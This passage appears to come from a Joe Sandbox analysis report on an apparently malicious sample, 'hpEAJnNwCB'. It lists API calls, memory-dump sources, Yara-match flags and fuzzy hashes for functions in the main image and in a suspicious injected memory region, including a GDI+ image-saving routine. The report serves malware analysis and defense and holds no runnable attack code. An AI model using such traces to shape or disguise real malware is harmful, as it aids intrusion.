• API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
• String ID: pScheduler
• API String ID: 3657713681-923244539
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: H_prolog3_catchmake_shared
• String ID: MOC$RCC$v)D
• API String ID: 3472968176-3108830043
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: _free$AllocateHeap
• API String ID: 3033488037-0
APIs
  • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
• _free.LIBCMT ref: 00430B4F
• _free.LIBCMT ref: 00430B66
• _free.LIBCMT ref: 00430B85
• _free.LIBCMT ref: 00430BA0
• _free.LIBCMT ref: 00430BB7
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: _free$AllocateHeap
• API String ID: 3033488037-0
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: _free
• API String ID: 269201875-0
                                                                                                                                                                                                                                            • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                            • Instruction ID: 2e2d82ee6c473176e2bad6a2ac5dec20f0beca9c1cdcd249725ddaaaf771b6d9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B41A33AA012049FCB54DF7DC980A9EB7F6EF85714B2545AED919EB381D731E901CB80
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                            • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                            • Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00436922
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
                                                                                                                                                                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 0043698E
                                                                                                                                                                                                                                              • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 313313983-0
                                                                                                                                                                                                                                            • Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                                                                                                                                                                                            • Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _SpinWait.LIBCONCRT ref: 024AB152
                                                                                                                                                                                                                                              • Part of subcall function 024A1188: _SpinWait.LIBCONCRT ref: 024A11A0
                                                                                                                                                                                                                                            • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 024AB166
                                                                                                                                                                                                                                            • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 024AB198
                                                                                                                                                                                                                                            • List.LIBCMT ref: 024AB21B
                                                                                                                                                                                                                                            • List.LIBCMT ref: 024AB22A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3281396844-0
                                                                                                                                                                                                                                            • Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                                                                                                                                                                                                            • Instruction ID: acd93df21eb4b15ecb4f6cc5994a6528f2fc969a13f16d71c1480c1e42205113
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB315232904616DBCB11EFA4C9A06EEBBB2FF34348F04416FC8556B641CB716918CF90
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _SpinWait.LIBCONCRT ref: 0041AEEB
                                                                                                                                                                                                                                              • Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39
                                                                                                                                                                                                                                            • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
                                                                                                                                                                                                                                            • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
                                                                                                                                                                                                                                            • List.LIBCMT ref: 0041AFB4
                                                                                                                                                                                                                                            • List.LIBCMT ref: 0041AFC3
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3281396844-0
                                                                                                                                                                                                                                            • Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                                                                                                                                                                                                            • Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
                                                                                                                                                                                                                                            • GdipAlloc.GDIPLUS(00000010), ref: 00402072
                                                                                                                                                                                                                                            • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
                                                                                                                                                                                                                                            • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
                                                                                                                                                                                                                                            • GdiplusShutdown.GDIPLUS(?), ref: 004020E3
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2357751836-0
                                                                                                                                                                                                                                            • Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                                                                                                                                                                                                            • Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 024950A3
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 024950B7
• std::_Locinfo::_Locinfo.LIBCPMT ref: 0249511C
• __Getcoll.LIBCPMT ref: 0249512B
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 0249513B
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
• String ID:
• API String ID: 2395760641-0
• Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
• Instruction ID: c7e20b2a9d5f9da7fbf1080f6692a72461b94b7456312bff1bfa397b01fbbd0d
• Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
• Instruction Fuzzy Hash: 072187B2818204AFDF02EFA5C485BDDBBB1BF54715F60800FE085AB280DBB49648CF95
APIs
• GetLastError.KERNEL32(0249DAD7,0249DAD7,00000002,024BED35,024C3951,00000000,?,024B6A05,00000002,00000000,00000000,00000000,?,0249CF88,0249DAD7,00000004), ref: 024C21CA
• _free.LIBCMT ref: 024C21FF
• _free.LIBCMT ref: 024C2226
• SetLastError.KERNEL32(00000000,?,0249DAD7), ref: 024C2233
• SetLastError.KERNEL32(00000000,?,0249DAD7), ref: 024C223C
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
• Instruction ID: af4d423b540286f04ae6747c2631b2d365bb7bfb51b5fef4bc4894398fa3b5d6
• Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
• Instruction Fuzzy Hash: A701D63E2456003BD392AB2D5C44E1B262EABD2B72730012FFC15A6395EFF088028569
APIs
• GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
• _free.LIBCMT ref: 00431F98
• _free.LIBCMT ref: 00431FBF
• SetLastError.KERNEL32(00000000), ref: 00431FCC
• SetLastError.KERNEL32(00000000), ref: 00431FD5
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
• Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
• Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
• Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D
APIs
• GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
• _free.LIBCMT ref: 024C2178
• _free.LIBCMT ref: 024C21A0
• SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21AD
• SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
• Instruction ID: dfcc6cf2fba9aaa4ec78208e4bd32c16c8d0a72247315e59701b53b6ac32b0ca
• Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
• Instruction Fuzzy Hash: EDF0863D2446003BD297772DAC04B5F262A9BC2F62B35022FFD19A23A0EFE185028569
APIs
• GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
• _free.LIBCMT ref: 00431F11
• _free.LIBCMT ref: 00431F39
• SetLastError.KERNEL32(00000000), ref: 00431F46
• SetLastError.KERNEL32(00000000), ref: 00431F52
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
• Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
• Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
• Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D
APIs
  • Part of subcall function 024A29A4: TlsGetValue.KERNEL32(?,?,024A0DC2,024A2ECF,00000000,?,024A0DA0,?,?,?,00000000,?,00000000), ref: 024A29AA
• Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 024A7BB1
  • Part of subcall function 024B121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 024B1241
  • Part of subcall function 024B121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 024B125A
  • Part of subcall function 024B121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 024B12D0
  • Part of subcall function 024B121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 024B12D8
• Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 024A7BBF
• Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 024A7BC9
• Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 024A7BD3
• __CxxThrowException@8.LIBVCRUNTIME ref: 024A7BF1
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
• String ID:
• API String ID: 4266703842-0
• Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
• Instruction ID: 63a6168efa59bc22ac29f1bd201fa3cb77218330133dfbef81b4fe908216b4b4
• Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
• Instruction Fuzzy Hash: 32F0C275A0021867CB25F676983096EF62BDFF0B18B00416FD80057350DF649A158E91
APIs
  • Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743
• Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A
  • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
  • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
  • Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
  • Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071
• Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
                                                                                                                                                                                                                                            • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041798A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4266703842-0
                                                                                                                                                                                                                                            • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                            • Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA0C4
                                                                                                                                                                                                                                              • Part of subcall function 024C36D1: HeapFree.KERNEL32(00000000,00000000,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?), ref: 024C36E7
                                                                                                                                                                                                                                              • Part of subcall function 024C36D1: GetLastError.KERNEL32(?,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?,?), ref: 024C36F9
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA0D6
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA0E8
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA0FA
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA10C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                            • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                            • Instruction ID: 382cd38c2e09aeaaaa1a273c4c19b31b4e060b8ddf77ccfe49a8ec4bbb6470bf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5AF044366052186B87F0EF5DE8C6C0777EAAA04754774495FF044D7B11CB71F8908E59
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00439E5D
                                                                                                                                                                                                                                              • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                              • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00439E6F
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00439E81
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00439E93
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00439EA5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                            • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                            • Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C19AF
                                                                                                                                                                                                                                              • Part of subcall function 024C36D1: HeapFree.KERNEL32(00000000,00000000,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?), ref: 024C36E7
                                                                                                                                                                                                                                              • Part of subcall function 024C36D1: GetLastError.KERNEL32(?,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?,?), ref: 024C36F9
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C19C1
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C19D4
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C19E5
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C19F6
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                            • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                            • Instruction ID: 4417496dd0717ad0ad03f2fb9fd64814597d5885c6c8796930f198c9e8e9ef97
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93F0F974A003109B9BB17F19AC808053F61AF09B2272042AFF406967B2C774A862DFCE
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 024ACF36
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 024ACF67
                                                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 024ACF70
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 024ACF83
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 024ACF8C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2583373041-0
                                                                                                                                                                                                                                            • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                            • Instruction ID: 3992490ed3ab8e19f410018ee051475ae6215b4c94b92ceb980878a141b5f018
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0FF0A732200500DBCB25EF22E6B08BBB7B6AFE4610340454FF58707590DF21A847DB61
APIs
• _free.LIBCMT ref: 00431748
